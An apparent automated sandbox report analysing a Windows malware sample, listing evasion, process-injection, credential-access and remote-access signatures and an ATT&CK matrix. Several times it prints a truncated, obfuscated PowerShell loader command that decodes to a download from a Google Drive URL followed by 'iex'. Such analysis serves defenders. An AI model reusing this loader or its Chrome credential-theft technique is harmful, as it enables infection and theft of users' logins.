                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5860Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3951Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6604Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3141Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6128Thread sleep count: 5199 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1272Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 5199 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 60000Jump to behavior
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2280020509.00000297EE1EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeP
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0299DAAC LdrInitializeThunk,LdrInitializeThunk,5_2_0299DAAC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_5972.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2EC0000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 7EFDF4Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2584, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2584, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                221
                Scripting
                111
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                111
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                141
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)111
                Process Injection
                Security Account Manager141
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                Login HookLogin Hook2
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture14
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
